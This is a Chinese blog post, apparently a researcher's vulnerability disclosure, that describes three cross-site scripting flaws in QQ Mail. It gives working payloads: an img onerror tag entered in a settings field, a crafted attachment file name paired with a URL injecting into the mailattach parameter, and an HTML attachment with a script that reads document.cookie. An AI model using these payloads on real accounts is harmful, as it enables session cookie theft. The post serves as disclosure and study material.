QQ邮箱的三个XSS

一、详细说明:

QQ邮箱–>阅读空间–>设置–>订阅管理–>新建分类 页面

一个self xss吧

(快速跳转请戳:http://r.mail.qq.com/cgi-bin/reader_data?fun=list&t=rss_setting_feeds&s=setting&sid={你的sid})

点击新建一个分类,输入:



\x3cimg src=\x22x\x22 onerror=alert(document.cookie)\x3e

点击提交



一、详细说明:

又一个XSS,无意中发现,windows下文件名不能包含 <> ,而linux下可以,于是构造文件名 “><img src=”x” onerror=alert()> 。在QQ邮箱发信中拖拽上传,此时会弹框,然后点保存到草稿。

在QQ邮箱附件夹链接处,发现这个文件,点击文件名,弹框。出事的地址在:





http://mail.qq.com/cgi-bin/readmail?sid={你的sid}&t=compose.json&s=forward&from=attachfolder&disptype=html&ef=js&mailattach=a|a%22%3E%3Cimg+src%3D%22x%22+onerror%3Dalert%28%27xss%27%29%3E%3C

mailsttach参数过滤不严格。



一、详细说明:

QQ邮箱在上传完html格式附件后,点击附件出现预览界面,此时会执行附件中的代码。

如上传a.html内容为





<script>

 var a = document.cookie;

alert(a); 

</script>

这样一来也可以盗取用户的cookie,虽然是个self-xss,但是结合猥琐流,还是存在一定的危险

本文最后更新于 2020-01-08 20:17

请博主喝杯咖啡呢,谢谢^_^

如果本文“对您或有帮助”,欢迎随意打赏,以资鼓励继续创作!

原创文章《QQ邮箱的三个XSS》,作者:笔者 徐哲钻石会员,未经允许不得转载。
转载或复制时,请注明出处:https://www.xuxiaokun.com/81.html,本文由 Mr.xu 博客网 整理。
本站资源下载仅供个人学习交流,请于下载后24小时内删除,不允许用于商业用途,否则法律问题自行承担。

(0)
打赏 微信扫一扫赞赏 微信扫一扫赞赏 支付宝扫一扫赞赏 支付宝扫一扫赞赏
上一篇 2014年6月1日
下一篇 2014年6月1日

相关推荐

发表回复

登录后才能评论

此站点使用Akismet来减少垃圾评论。了解我们如何处理您的评论数据

笔者期待与您共勉 · 互赢

有言必答、商务合作、有偿服务

QQ:点击这里给我发消息

邮件:it@xuxiaokun.com

线上沟通时间 ↓↓↓:

周一至周五 9:30 - 17:30

其余时间Mail或QQ我,有言必应。

244439232